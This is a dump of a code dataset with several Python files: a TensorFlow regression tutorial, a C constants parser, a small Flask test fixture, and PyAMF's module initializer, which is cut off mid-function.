_old_basic_tensorflow/tutorial2_simpleRegressionLowLevel/simpleRegressionLowLevel.py
|
UnnamedMoose/LearningMLandRL
|
a3a47998c32078a069ea82ce0032c30bb8b387f2
|
[
"MIT"
] | null | null | null |
_old_basic_tensorflow/tutorial2_simpleRegressionLowLevel/simpleRegressionLowLevel.py
|
UnnamedMoose/LearningMLandRL
|
a3a47998c32078a069ea82ce0032c30bb8b387f2
|
[
"MIT"
] | 1
|
2018-03-14T18:23:10.000Z
|
2018-03-14T18:23:10.000Z
|
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
# correlation variable x and ground truth values
x = tf.constant([[1], [2], [3], [4]], dtype=tf.float32, name="inputData")
y_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32, name="groundTruth")
# linear model
linear_model = tf.layers.Dense(units=1, name="regressionModel")
# prediciton of y from x using the linear model is what we're after
y_pred = linear_model(x)
# loss model that computes mean square error between the ground truth and predictions
loss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)
# create an optimiser instance that will tune the coefficients of the graph
# in order to minimise the loss function
optimizer = tf.train.GradientDescentOptimizer(0.01, name="gradientOpt")
train = optimizer.minimize(loss)
# initialiser
init = tf.global_variables_initializer()
# create a writer for graph visualisation; produces an "event" file
writer = tf.summary.FileWriter("./modelData")
writer.add_graph(tf.get_default_graph())
lossTrace = []
with tf.Session() as sess:
# initialise
sess.run(init)
# run the training
for i in range(1000):
_, loss_value = sess.run((train, loss))
lossTrace = np.append(lossTrace, loss_value)
if i%100 == 0:
print("Iter {:2d}, loss ={:7.4f}".format(i, loss_value))
# come up with the final prediciton and convert to numpy arrays for further processing
independentVariable = sess.run(x)
finalPred = sess.run(y_pred)
groundTruth = sess.run(y_true)
print("\nFinal prediction: {}".format(finalPred))
print("\nGround truth: {}".format(groundTruth))
plt.figure()
plt.plot(lossTrace, "kp--", ms=5, lw=2)
plt.xlabel("Iteration")
plt.ylabel("Loss [-]")
plt.figure()
plt.plot(independentVariable, groundTruth, "kp--", ms=9, lw=2, label="Ground truth")
plt.plot(independentVariable, finalPred, "rx--", ms=9, lw=2,
markeredgewidth=2, label="Predicted value")
plt.legend(prop={"size":14})
plt.xlabel("x")
plt.ylabel("y")
plt.show()
| 32.666667
| 90
| 0.706511
|
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
x = tf.constant([[1], [2], [3], [4]], dtype=tf.float32, name="inputData")
y_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32, name="groundTruth")
linear_model = tf.layers.Dense(units=1, name="regressionModel")
y_pred = linear_model(x)
# loss model that computes mean square error between the ground truth and predictions
loss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)
# create an optimiser instance that will tune the coefficients of the graph
# in order to minimise the loss function
optimizer = tf.train.GradientDescentOptimizer(0.01, name="gradientOpt")
train = optimizer.minimize(loss)
# initialiser
init = tf.global_variables_initializer()
# create a writer for graph visualisation; produces an "event" file
writer = tf.summary.FileWriter("./modelData")
writer.add_graph(tf.get_default_graph())
lossTrace = []
with tf.Session() as sess:
# initialise
sess.run(init)
# run the training
for i in range(1000):
_, loss_value = sess.run((train, loss))
lossTrace = np.append(lossTrace, loss_value)
if i%100 == 0:
print("Iter {:2d}, loss ={:7.4f}".format(i, loss_value))
# come up with the final prediciton and convert to numpy arrays for further processing
independentVariable = sess.run(x)
finalPred = sess.run(y_pred)
groundTruth = sess.run(y_true)
print("\nFinal prediction: {}".format(finalPred))
print("\nGround truth: {}".format(groundTruth))
plt.figure()
plt.plot(lossTrace, "kp--", ms=5, lw=2)
plt.xlabel("Iteration")
plt.ylabel("Loss [-]")
plt.figure()
plt.plot(independentVariable, groundTruth, "kp--", ms=9, lw=2, label="Ground truth")
plt.plot(independentVariable, finalPred, "rx--", ms=9, lw=2,
markeredgewidth=2, label="Predicted value")
plt.legend(prop={"size":14})
plt.xlabel("x")
plt.ylabel("y")
plt.show()
| true
| true
|
1c420bf7c19855a237c76ab11081492f6b152c52
| 89
|
py
|
Python
|
main.py
|
asa-leholland/GRE-calculator
|
43530e24c2e6059ce03027eec1cce82d4fe70479
|
[
"MIT"
] | null | null | null |
main.py
|
asa-leholland/GRE-calculator
|
43530e24c2e6059ce03027eec1cce82d4fe70479
|
[
"MIT"
] | 1
|
2020-12-08T22:41:41.000Z
|
2020-12-08T22:41:41.000Z
|
main.py
|
asa-leholland/GRE-calculator
|
43530e24c2e6059ce03027eec1cce82d4fe70479
|
[
"MIT"
] | null | null | null |
# main.py
from GRECalculator import Calculator_GRE
Calculator_GRE.run_calculator_app()
| 17.8
| 40
| 0.842697
|
from GRECalculator import Calculator_GRE
Calculator_GRE.run_calculator_app()
| true
| true
|
1c420e114a9eed82cb11c9a5c735161c1461defa
| 6,106
|
py
|
Python
|
constantsgen/constantsparse.py
|
barracudanetworks/constantsgen
|
ff5b0a2d9d297b5da6d4475a91b8180ce9b60f16
|
[
"BSD-3-Clause"
] | null | null | null |
constantsgen/constantsparse.py
|
barracudanetworks/constantsgen
|
ff5b0a2d9d297b5da6d4475a91b8180ce9b60f16
|
[
"BSD-3-Clause"
] | 1
|
2016-12-15T18:41:51.000Z
|
2016-12-15T18:41:51.000Z
|
constantsgen/constantsparse.py
|
barracudanetworks/constantsgen
|
ff5b0a2d9d297b5da6d4475a91b8180ce9b60f16
|
[
"BSD-3-Clause"
] | 1
|
2016-09-25T21:26:54.000Z
|
2016-09-25T21:26:54.000Z
|
import re
import os
from collections import namedtuple, OrderedDict
EnumImport = namedtuple("EnumImport",
"source_name destination_name name_overrides")
# #define constants.
constants = re.compile(r"#define ([^\s]+)\s+(.+)")
# Enums.
enums = re.compile(r"enum[^{]+\{[^}]+\};")
# Name of an enum.
enum_name = re.compile(r"enum\s+([^\s{]+)")
# Enum contents between the braces.
enum_contents = re.compile(r"{([^}]+)};")
# Enum value with an explicit value.
enum_explicit_value = re.compile(r"(?:\s*([^\s]+)\s*=\s*([^\s,]+),?)$",
flags=re.MULTILINE)
# Enum value with an implicit value.
enum_implicit_value = re.compile(r"(?:^\s*([^\s,]+),?$)", flags=re.MULTILINE)
class ConstantsParser:
def __init__(self, input_file):
self.source_files = []
self.imported_constants = {}
self.imported_enums = {}
self.constant_values = OrderedDict()
self.enum_values = OrderedDict()
manual_suffixes = OrderedDict()
section = None
for line in input_file:
# Skip blank lines and comments
if line == "\n" or line.startswith("#"):
continue
# Set section based on header
if line.endswith(":\n"):
section = line[:-2]
continue
if section == "file":
self.source_files.append(line[:-1])
elif section == "constant":
words = line.split()
assert len(words) <= 2
# Export as the source name if only one is provided; otherwise
# use the override.
self.imported_constants[words[0]] = words[-1]
elif section == "enum":
words = line.split()
assert len(words) >= 2
name_overrides = {}
if len(words) > 2:
overrides = words[2:]
# Pairs: source_name dest_name
assert len(overrides) % 2 == 0
index = 0
while index + 1 < len(overrides):
name_overrides[overrides[index]] = overrides[index + 1]
index += 2
target = EnumImport(words[0], words[1], name_overrides)
self.imported_enums[target.source_name] = target
elif section.startswith("manual"):
target_container = None
if section == "manual_prefix":
target_container = self.constant_values
elif section == "manual" or section == "manual_suffix":
target_container = manual_suffixes
if target_container is not None:
# Separate the key, and only the key, by whitespace.
# The remainder of the line is the value.
key, value = line.split(None, 1)
target_container[key] = value.rstrip()
for filename in self.source_files:
# Resolve paths in input file relative to its location.
input_dir = os.path.dirname(input_file.name)
file = open(os.path.join(input_dir, filename)).read()
for constant in constants.findall(file):
name, value = constant
if name not in self.imported_constants:
continue
name = self.imported_constants.pop(name)
self.constant_values[name] = value
for enum in enums.findall(file):
# TODO: Could generate Enum classes only?
# TODO: Option to consider an enum individual constants?
name_search = enum_name.search(enum)
if not name_search:
continue
name = name_search.group(1)
if not name in self.imported_enums:
continue
enum_definition = self.imported_enums.pop(name)
contents = enum_contents.search(enum).group(1)
name = enum_definition.destination_name
self.enum_values[name] = OrderedDict()
enum_values = self.enum_values[name]
explicit_values = enum_explicit_value.findall(contents)
if explicit_values:
for name, value in explicit_values:
if name in enum_definition.name_overrides:
name = enum_definition.name_overrides[name]
enum_values[name] = value
implicit_values = enum_implicit_value.findall(contents)
# If there are any explicit values this assumes either all
# values are explicit or only the first is explicit and the rest
# are implicit.
# TODO: Use C constants for extracted enums?
if implicit_values:
assert len(explicit_values) <= 1
value = 0
if explicit_values:
name = explicit_values[0][0]
if name in enum_definition.name_overrides:
name = enum_definition.name_overrides[name]
value = int(enum_values[name], base=0) + 1
for name in implicit_values:
if name in enum_definition.name_overrides:
name = enum_definition.name_overrides[name]
enum_values[name] = value
value += 1
assert enum_values
if self.imported_constants:
names = list(self.imported_constants)
raise Exception("constants {} not found".format(names))
if self.imported_enums:
names = list(self.imported_enums)
raise Exception("enums {} not found".format(names))
# Add manual suffixes now that all values are loaded.
for name, value in manual_suffixes.items():
self.constant_values[name] = value
| 36.783133
| 80
| 0.531281
|
import re
import os
from collections import namedtuple, OrderedDict
EnumImport = namedtuple("EnumImport",
"source_name destination_name name_overrides")
mpile(r"#define ([^\s]+)\s+(.+)")
enums = re.compile(r"enum[^{]+\{[^}]+\};")
enum_name = re.compile(r"enum\s+([^\s{]+)")
enum_contents = re.compile(r"{([^}]+)};")
enum_explicit_value = re.compile(r"(?:\s*([^\s]+)\s*=\s*([^\s,]+),?)$",
flags=re.MULTILINE)
enum_implicit_value = re.compile(r"(?:^\s*([^\s,]+),?$)", flags=re.MULTILINE)
class ConstantsParser:
def __init__(self, input_file):
self.source_files = []
self.imported_constants = {}
self.imported_enums = {}
self.constant_values = OrderedDict()
self.enum_values = OrderedDict()
manual_suffixes = OrderedDict()
section = None
for line in input_file:
if line == "\n" or line.startswith("#"):
continue
if line.endswith(":\n"):
section = line[:-2]
continue
if section == "file":
self.source_files.append(line[:-1])
elif section == "constant":
words = line.split()
assert len(words) <= 2
self.imported_constants[words[0]] = words[-1]
elif section == "enum":
words = line.split()
assert len(words) >= 2
name_overrides = {}
if len(words) > 2:
overrides = words[2:]
assert len(overrides) % 2 == 0
index = 0
while index + 1 < len(overrides):
name_overrides[overrides[index]] = overrides[index + 1]
index += 2
target = EnumImport(words[0], words[1], name_overrides)
self.imported_enums[target.source_name] = target
elif section.startswith("manual"):
target_container = None
if section == "manual_prefix":
target_container = self.constant_values
elif section == "manual" or section == "manual_suffix":
target_container = manual_suffixes
if target_container is not None:
key, value = line.split(None, 1)
target_container[key] = value.rstrip()
for filename in self.source_files:
input_dir = os.path.dirname(input_file.name)
file = open(os.path.join(input_dir, filename)).read()
for constant in constants.findall(file):
name, value = constant
if name not in self.imported_constants:
continue
name = self.imported_constants.pop(name)
self.constant_values[name] = value
for enum in enums.findall(file):
name_search = enum_name.search(enum)
if not name_search:
continue
name = name_search.group(1)
if not name in self.imported_enums:
continue
enum_definition = self.imported_enums.pop(name)
contents = enum_contents.search(enum).group(1)
name = enum_definition.destination_name
self.enum_values[name] = OrderedDict()
enum_values = self.enum_values[name]
explicit_values = enum_explicit_value.findall(contents)
if explicit_values:
for name, value in explicit_values:
if name in enum_definition.name_overrides:
name = enum_definition.name_overrides[name]
enum_values[name] = value
implicit_values = enum_implicit_value.findall(contents)
if implicit_values:
assert len(explicit_values) <= 1
value = 0
if explicit_values:
name = explicit_values[0][0]
if name in enum_definition.name_overrides:
name = enum_definition.name_overrides[name]
value = int(enum_values[name], base=0) + 1
for name in implicit_values:
if name in enum_definition.name_overrides:
name = enum_definition.name_overrides[name]
enum_values[name] = value
value += 1
assert enum_values
if self.imported_constants:
names = list(self.imported_constants)
raise Exception("constants {} not found".format(names))
if self.imported_enums:
names = list(self.imported_enums)
raise Exception("enums {} not found".format(names))
for name, value in manual_suffixes.items():
self.constant_values[name] = value
| true
| true
|
1c420f99903144b944d2260c5b9ff72eff0c7772
| 274
|
py
|
Python
|
integration/tests_failed/query_invalid_utf8.py
|
jleverenz/hurl
|
b81ca8ab7e0e409ec0c074fd8e118721ff4d3fb3
|
[
"Apache-2.0"
] | null | null | null |
integration/tests_failed/query_invalid_utf8.py
|
jleverenz/hurl
|
b81ca8ab7e0e409ec0c074fd8e118721ff4d3fb3
|
[
"Apache-2.0"
] | null | null | null |
integration/tests_failed/query_invalid_utf8.py
|
jleverenz/hurl
|
b81ca8ab7e0e409ec0c074fd8e118721ff4d3fb3
|
[
"Apache-2.0"
] | null | null | null |
from app import app
from flask import make_response
from io import BytesIO
@app.route("/error-query-invalid-utf8")
def error_query_invalid_utf8():
result = BytesIO()
result.write(b"\xff")
data = result.getvalue()
resp = make_response(data)
return resp
| 21.076923
| 39
| 0.715328
|
from app import app
from flask import make_response
from io import BytesIO
@app.route("/error-query-invalid-utf8")
def error_query_invalid_utf8():
result = BytesIO()
result.write(b"\xff")
data = result.getvalue()
resp = make_response(data)
return resp
| true
| true
|
1c42108de4de8747904799e9ec22da386bb66ec9
| 23,990
|
py
|
Python
|
lib/PyAMF-0.6.1/pyamf/__init__.py
|
MiCHiLU/google_appengine_sdk
|
3da9f20d7e65e26c4938d2c4054bc4f39cbc5522
|
[
"Apache-2.0"
] | 790
|
2015-01-03T02:13:39.000Z
|
2020-05-10T19:53:57.000Z
|
AppServer/lib/PyAMF-0.6.1/pyamf/__init__.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | 1,361
|
2015-01-08T23:09:40.000Z
|
2020-04-14T00:03:04.000Z
|
AppServer/lib/PyAMF-0.6.1/pyamf/__init__.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | 155
|
2015-01-08T22:59:31.000Z
|
2020-04-08T08:01:53.000Z
|
# Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
U{PyAMF<http://pyamf.org>} provides Action Message Format (U{AMF
<http://en.wikipedia.org/wiki/Action_Message_Format>}) support for Python that
is compatible with the Adobe U{Flash Player
<http://en.wikipedia.org/wiki/Flash_Player>}.
@since: October 2007
@status: Production/Stable
"""
import types
import inspect
from pyamf import util, _version
from pyamf.adapters import register_adapters
from pyamf import python
from pyamf.alias import ClassAlias, UnknownClassAlias
__all__ = [
'register_class',
'register_class_loader',
'encode',
'decode',
'__version__',
'version'
]
#: PyAMF version number.
__version__ = version = _version.version
#: Class alias mapping support. Contains two types of keys: The string alias
#: related to the class and the class object itself. Both point to the linked
#: L{ClassAlias} object.
#: @see: L{register_class}, L{unregister_class}, and L{register_package}
CLASS_CACHE = {}
#: Class loaders. An iterable of callables that are handed a string alias and
#: return a class object or C{None} it not handled.
#: @see: L{register_class_loader} and L{unregister_class_loader}
CLASS_LOADERS = set()
#: Custom type map.
#: @see: L{get_type}, L{add_type}, and L{remove_type}
TYPE_MAP = {}
#: Maps error classes to string codes.
#: @see: L{add_error_class} and L{remove_error_class}
ERROR_CLASS_MAP = {
TypeError.__name__: TypeError,
KeyError.__name__: KeyError,
LookupError.__name__: LookupError,
IndexError.__name__: IndexError,
NameError.__name__: NameError,
ValueError.__name__: ValueError
}
#: Alias mapping support.
#: @see: L{get_class_alias}, L{register_alias_type}, and L{unregister_alias_type}
ALIAS_TYPES = {}
#: Specifies that objects are serialized using AMF for ActionScript 1.0
#: and 2.0 that were introduced in the Adobe Flash Player 6.
AMF0 = 0
#: Specifies that objects are serialized using AMF for ActionScript 3.0
#: that was introduced in the Adobe Flash Player 9.
AMF3 = 3
#: Supported AMF encoding types.
#: @see: L{AMF0}, L{AMF3}, and L{DEFAULT_ENCODING}
ENCODING_TYPES = (AMF0, AMF3)
#: Default encoding
DEFAULT_ENCODING = AMF3
class UndefinedType(object):
"""
Represents the C{undefined} value in the Adobe Flash Player client.
"""
def __repr__(self):
return 'pyamf.Undefined'
#: Represents the C{undefined} value in the Adobe Flash Player client.
Undefined = UndefinedType()
class BaseError(Exception):
"""
Base AMF Error.
All AMF related errors should be subclassed from this class.
"""
class DecodeError(BaseError):
"""
Raised if there is an error in decoding an AMF data stream.
"""
class EOStream(BaseError):
"""
Raised if the data stream has come to a natural end.
"""
class ReferenceError(BaseError):
"""
Raised if an AMF data stream refers to a non-existent object or string
reference (in the case of AMF3).
"""
class EncodeError(BaseError):
"""
Raised if the element could not be encoded to AMF.
"""
class ASObject(dict):
"""
Represents a Flash Actionscript Object (typed or untyped).
I supply a C{dict} interface to support C{getattr}/C{setattr} calls.
"""
class __amf__:
dynamic = True
def __getattr__(self, k):
try:
return self[k]
except KeyError:
raise AttributeError('Unknown attribute \'%s\'' % (k,))
def __setattr__(self, k, v):
self[k] = v
def __repr__(self):
return dict.__repr__(self)
def __hash__(self):
return id(self)
class MixedArray(dict):
"""
Used to be able to specify the C{mixedarray} type.
"""
class TypedObject(dict):
"""
This class is used when a strongly typed object is decoded but there is no
registered class to apply it to.
This object can only be used for standard streams - i.e. not externalized
data. If encountered, a L{DecodeError} will be raised.
@ivar alias: The alias of the typed object.
@type alias: C{string}
@since: 0.4
"""
def __init__(self, alias):
dict.__init__(self)
self.alias = alias
def __readamf__(self, o):
raise DecodeError('Unable to decode an externalised stream with '
'class alias \'%s\'.\n\nA class alias was found and because '
'strict mode is False an attempt was made to decode the object '
'automatically. To decode this stream, a registered class with '
'the alias and a corresponding __readamf__ method will be '
'required.' % (self.alias,))
def __writeamf__(self, o):
raise EncodeError('Unable to encode an externalised stream with '
'class alias \'%s\'.\n\nA class alias was found and because '
'strict mode is False an attempt was made to encode the object '
'automatically. To encode this stream, a registered class with '
'the alias and a corresponding __writeamf__ method will be '
'required.' % (self.alias,))
class TypedObjectClassAlias(ClassAlias):
"""
The meta class for L{TypedObject} used to adapt PyAMF.
@since: 0.4
"""
klass = TypedObject
def __init__(self, *args, **kwargs):
ClassAlias.__init__(self, self.klass, kwargs.pop('alias', args[0]))
def createInstance(self, codec=None):
return self.klass(self.alias)
def checkClass(kls, klass):
pass
class ErrorAlias(ClassAlias):
"""
Adapts Python exception objects to Adobe Flash Player error objects.
@since: 0.5
"""
def getCustomProperties(self):
self.exclude_attrs.update(['args'])
def getEncodableAttributes(self, obj, **kwargs):
attrs = ClassAlias.getEncodableAttributes(self, obj, **kwargs)
attrs['message'] = str(obj)
attrs['name'] = obj.__class__.__name__
return attrs
def register_class(klass, alias=None):
"""
Registers a class to be used in the data streaming. This is the equivalent
to the C{[RemoteClass(alias="foobar")]} AS3 metatag.
@return: The registered L{ClassAlias} instance.
@see: L{unregister_class}
"""
meta = util.get_class_meta(klass)
if alias is not None:
meta['alias'] = alias
alias_klass = util.get_class_alias(klass) or ClassAlias
x = alias_klass(klass, defer=True, **meta)
if not x.anonymous:
CLASS_CACHE[x.alias] = x
CLASS_CACHE[klass] = x
return x
def unregister_class(alias):
"""
Opposite of L{register_class}.
@raise UnknownClassAlias: Unknown alias.
"""
try:
x = CLASS_CACHE[alias]
except KeyError:
raise UnknownClassAlias('Unknown alias %r' % (alias,))
if not x.anonymous:
del CLASS_CACHE[x.alias]
del CLASS_CACHE[x.klass]
return x
def get_class_alias(klass_or_alias):
"""
Finds the L{ClassAlias} that is registered to C{klass_or_alias}.
If a string is supplied and no related L{ClassAlias} is found, the alias is
loaded via L{load_class}.
@raise UnknownClassAlias: Unknown alias
"""
if isinstance(klass_or_alias, python.str_types):
try:
return CLASS_CACHE[klass_or_alias]
except KeyError:
return load_class(klass_or_alias)
try:
return CLASS_CACHE[klass_or_alias]
except KeyError:
raise UnknownClassAlias('Unknown alias for %r' % (klass_or_alias,))
def register_class_loader(loader):
"""
Registers a loader that is called to provide the C{class} for a specific
alias.
The C{loader} is provided with one argument, the class alias (as a string).
If the loader succeeds in finding a suitable class then it should return
that class, otherwise it should return C{None}.
An example::
def lazy_load_from_my_module(alias):
if not alias.startswith('foo.bar.'):
return None
from foo import bar
if alias == 'foo.bar.Spam':
return bar.Spam
elif alias == 'foo.bar.Eggs':
return bar.Eggs
pyamf.register_class_loader(lazy_load_from_my_module)
@raise TypeError: C{loader} must be callable
@see: L{unregister_class_loader}
"""
if not hasattr(loader, '__call__'):
raise TypeError("loader must be callable")
CLASS_LOADERS.update([loader])
def unregister_class_loader(loader):
"""
Unregisters a class loader.
@param loader: The class loader to be unregistered.
@raise LookupError: The C{loader} was not registered.
@see: L{register_class_loader}
"""
try:
CLASS_LOADERS.remove(loader)
except KeyError:
raise LookupError("loader not found")
def load_class(alias):
"""
Finds the class registered to the alias.
The search is done in order:
1. Checks if the class name has been registered via L{register_class}
or L{register_package}.
2. Checks all functions registered via L{register_class_loader}.
3. Attempts to load the class via standard module loading techniques.
@param alias: The class name.
@type alias: C{string}
@raise UnknownClassAlias: The C{alias} was not found.
@raise TypeError: Expecting class type or L{ClassAlias} from loader.
@return: Class registered to the alias.
@rtype: C{classobj}
"""
# Try the CLASS_CACHE first
try:
return CLASS_CACHE[alias]
except KeyError:
pass
for loader in CLASS_LOADERS:
klass = loader(alias)
if klass is None:
continue
if isinstance(klass, python.class_types):
return register_class(klass, alias)
elif isinstance(klass, ClassAlias):
CLASS_CACHE[klass.alias] = klass
CLASS_CACHE[klass.klass] = klass
return klass
raise TypeError("Expecting class object or ClassAlias from loader")
mod_class = alias.split('.')
if mod_class:
module = '.'.join(mod_class[:-1])
klass = mod_class[-1]
try:
module = util.get_module(module)
except (ImportError, AttributeError):
pass
else:
klass = getattr(module, klass)
if isinstance(klass, python.class_types):
return register_class(klass, alias)
elif isinstance(klass, ClassAlias):
CLASS_CACHE[klass.alias] = klass
CLASS_CACHE[klass.klass] = klass
return klass.klass
else:
raise TypeError("Expecting class type or ClassAlias from loader")
# All available methods for finding the class have been exhausted
raise UnknownClassAlias("Unknown alias for %r" % (alias,))
def decode(stream, *args, **kwargs):
"""
A generator function to decode a datastream.
@param stream: AMF data to be decoded.
@type stream: byte data.
@kwarg encoding: AMF encoding type. One of L{ENCODING_TYPES}.
@return: A generator that will decode each element in the stream.
"""
encoding = kwargs.pop('encoding', DEFAULT_ENCODING)
decoder = get_decoder(encoding, stream, *args, **kwargs)
return decoder
def encode(*args, **kwargs):
"""
A helper function to encode an element.
@param args: The python data to be encoded.
@kwarg encoding: AMF encoding type. One of L{ENCODING_TYPES}.
@return: A L{util.BufferedByteStream} object that contains the data.
"""
encoding = kwargs.pop('encoding', DEFAULT_ENCODING)
encoder = get_encoder(encoding, **kwargs)
[encoder.writeElement(el) for el in args]
stream = encoder.stream
stream.seek(0)
return stream
def get_decoder(encoding, *args, **kwargs):
"""
Returns a L{codec.Decoder} capable of decoding AMF[C{encoding}] streams.
@raise ValueError: Unknown C{encoding}.
"""
def _get_decoder_class():
if encoding == AMF0:
try:
from cpyamf import amf0
except ImportError:
from pyamf import amf0
return amf0.Decoder
elif encoding == AMF3:
try:
from cpyamf import amf3
except ImportError:
from pyamf import amf3
return amf3.Decoder
raise ValueError("Unknown encoding %r" % (encoding,))
return _get_decoder_class()(*args, **kwargs)
def get_encoder(encoding, *args, **kwargs):
"""
Returns a L{codec.Encoder} capable of encoding AMF[C{encoding}] streams.
@raise ValueError: Unknown C{encoding}.
"""
def _get_encoder_class():
if encoding == AMF0:
try:
from cpyamf import amf0
except ImportError:
from pyamf import amf0
return amf0.Encoder
elif encoding == AMF3:
try:
from cpyamf import amf3
except ImportError:
from pyamf import amf3
return amf3.Encoder
raise ValueError("Unknown encoding %r" % (encoding,))
return _get_encoder_class()(*args, **kwargs)
def blaze_loader(alias):
"""
Loader for BlazeDS framework compatibility classes, specifically
implementing C{ISmallMessage}.
@see: U{BlazeDS<http://opensource.adobe.com/wiki/display/blazeds/BlazeDS>}
@since: 0.5
"""
if alias not in ['DSC', 'DSK']:
return
import pyamf.flex.messaging
return CLASS_CACHE[alias]
def flex_loader(alias):
"""
Loader for L{Flex<pyamf.flex>} framework compatibility classes.
@raise UnknownClassAlias: Trying to load an unknown Flex compatibility class.
"""
if not alias.startswith('flex.'):
return
try:
if alias.startswith('flex.messaging.messages'):
import pyamf.flex.messaging
elif alias.startswith('flex.messaging.io'):
import pyamf.flex
elif alias.startswith('flex.data.messages'):
import pyamf.flex.data
return CLASS_CACHE[alias]
except KeyError:
raise UnknownClassAlias(alias)
def add_type(type_, func=None):
"""
Adds a custom type to L{TYPE_MAP}. A custom type allows fine grain control
of what to encode to an AMF data stream.
@raise TypeError: Unable to add as a custom type (expected a class or callable).
@raise KeyError: Type already exists.
@see: L{get_type} and L{remove_type}
"""
def _check_type(type_):
if not (isinstance(type_, python.class_types) or
hasattr(type_, '__call__')):
raise TypeError(r'Unable to add '%r' as a custom type (expected a '
'class or callable)' % (type_,))
if isinstance(type_, list):
type_ = tuple(type_)
if type_ in TYPE_MAP:
raise KeyError('Type %r already exists' % (type_,))
if isinstance(type_, types.TupleType):
for x in type_:
_check_type(x)
else:
_check_type(type_)
TYPE_MAP[type_] = func
def get_type(type_):
"""
Gets the declaration for the corresponding custom type.
@raise KeyError: Unknown type.
@see: L{add_type} and L{remove_type}
"""
if isinstance(type_, list):
type_ = tuple(type_)
for k, v in TYPE_MAP.iteritems():
if k == type_:
return v
raise KeyError("Unknown type %r" % (type_,))
def remove_type(type_):
"""
Removes the custom type declaration.
@return: Custom type declaration.
@see: L{add_type} and L{get_type}
"""
declaration = get_type(type_)
del TYPE_MAP[type_]
return declaration
def add_error_class(klass, code):
"""
Maps an exception class to a string code. Used to map remoting C{onStatus}
objects to an exception class so that an exception can be built to
represent that error.
An example::
>>> class AuthenticationError(Exception):
... pass
...
>>> pyamf.add_error_class(AuthenticationError, 'Auth.Failed')
>>> print pyamf.ERROR_CLASS_MAP
{'TypeError': <type 'exceptions.TypeError'>, 'IndexError': <type 'exceptions.IndexError'>,
'Auth.Failed': <class '__main__.AuthenticationError'>, 'KeyError': <type 'exceptions.KeyError'>,
'NameError': <type 'exceptions.NameError'>, 'LookupError': <type 'exceptions.LookupError'>}
@param klass: Exception class
@param code: Exception code
@type code: C{str}
@see: L{remove_error_class}
"""
if not isinstance(code, python.str_types):
code = code.decode('utf-8')
if not isinstance(klass, python.class_types):
raise TypeError("klass must be a class type")
mro = inspect.getmro(klass)
if not Exception in mro:
raise TypeError(
'Error classes must subclass the __builtin__.Exception class')
if code in ERROR_CLASS_MAP:
raise ValueError('Code %s is already registered' % (code,))
ERROR_CLASS_MAP[code] = klass
def remove_error_class(klass):
"""
Removes a class from the L{ERROR_CLASS_MAP}.
An example::
>>> class AuthenticationError(Exception):
... pass
...
>>> pyamf.add_error_class(AuthenticationError, 'Auth.Failed')
>>> pyamf.remove_error_class(AuthenticationError)
@see: L{add_error_class}
"""
if isinstance(klass, python.str_types):
if klass not in ERROR_CLASS_MAP:
raise ValueError('Code %s is not registered' % (klass,))
elif isinstance(klass, python.class_types):
classes = ERROR_CLASS_MAP.values()
if klass not in classes:
raise ValueError('Class %s is not registered' % (klass,))
klass = ERROR_CLASS_MAP.keys()[classes.index(klass)]
else:
raise TypeError("Invalid type, expected class or string")
del ERROR_CLASS_MAP[klass]
def register_alias_type(klass, *args):
"""
This function allows you to map subclasses of L{ClassAlias} to classes
listed in C{args}.
When an object is read/written from/to the AMF stream, a paired L{ClassAlias}
instance is created (or reused), based on the Python class of that object.
L{ClassAlias} provides important metadata for the class and can also control
how the equivalent Python object is created, how the attributes are applied
etc.
Use this function if you need to do something non-standard.
@since: 0.4
@see:
- L{pyamf.adapters._google_appengine_ext_db.DataStoreClassAlias} for a
good example.
- L{unregister_alias_type}
@raise RuntimeError: alias is already registered
@raise TypeError: Value supplied to C{klass} is not a class
@raise ValueError:
- New aliases must subclass L{pyamf.ClassAlias}
- At least one type must be supplied
"""
def check_type_registered(arg):
for k, v in ALIAS_TYPES.iteritems():
for kl in v:
if arg is kl:
raise RuntimeError('%r is already registered under %r' % (
arg, k))
if not isinstance(klass, python.class_types):
raise TypeError('klass must be class')
if not issubclass(klass, ClassAlias):
raise ValueError('New aliases must subclass pyamf.ClassAlias')
if len(args) == 0:
raise ValueError('At least one type must be supplied')
if len(args) == 1 and hasattr(args[0], '__call__'):
c = args[0]
check_type_registered(c)
else:
for arg in args:
if not isinstance(arg, python.class_types):
raise TypeError('%r must be class' % (arg,))
check_type_registered(arg)
ALIAS_TYPES[klass] = args
for k, v in CLASS_CACHE.copy().iteritems():
new_alias = util.get_class_alias(v.klass)
if new_alias is klass:
meta = util.get_class_meta(v.klass)
meta['alias'] = v.alias
alias_klass = klass(v.klass, **meta)
CLASS_CACHE[k] = alias_klass
CLASS_CACHE[v.klass] = alias_klass
def unregister_alias_type(klass):
"""
Removes the klass from the L{ALIAS_TYPES} register.
@see: L{register_alias_type}
"""
return ALIAS_TYPES.pop(klass, None)
def register_package(module=None, package=None, separator='.', ignore=[],
strict=True):
"""
This is a helper function that takes the concept of Actionscript packages
and registers all the classes in the supplied Python module under that
package. It auto-aliased all classes in C{module} based on the parent
C{package}.
@param module: The Python module that will contain all the classes to
auto alias.
@type module: C{module} or C{dict}
@param package: The base package name. e.g. 'com.example.app'. If this
is C{None} then the value is inferred from C{module.__name__}.
@type package: C{string} or C{None}
@param separator: The separator used to append to C{package} to form the
complete alias.
@param ignore: To give fine grain control over what gets aliased and what
doesn't, supply a list of classes that you B{do not} want to be aliased.
@type ignore: C{iterable}
@param strict: Whether only classes that originate from C{module} will be
registered.
@return: A dict of all the classes that were registered and their respective
L{ClassAlias} counterparts.
@since: 0.5
@raise TypeError: Cannot get a list of classes from C{module}
"""
if isinstance(module, python.str_types):
if module == '':
raise TypeError('Cannot get list of classes from %r' % (module,))
package = module
module = None
if module is None:
import inspect
prev_frame = inspect.stack()[1][0]
module = prev_frame.f_locals
if type(module) is dict:
has = lambda x: x in module
get = module.__getitem__
elif type(module) is list:
has = lambda x: x in module
get = module.__getitem__
strict = False
else:
has = lambda x: hasattr(module, x)
get = lambda x: getattr(module, x)
if package is None:
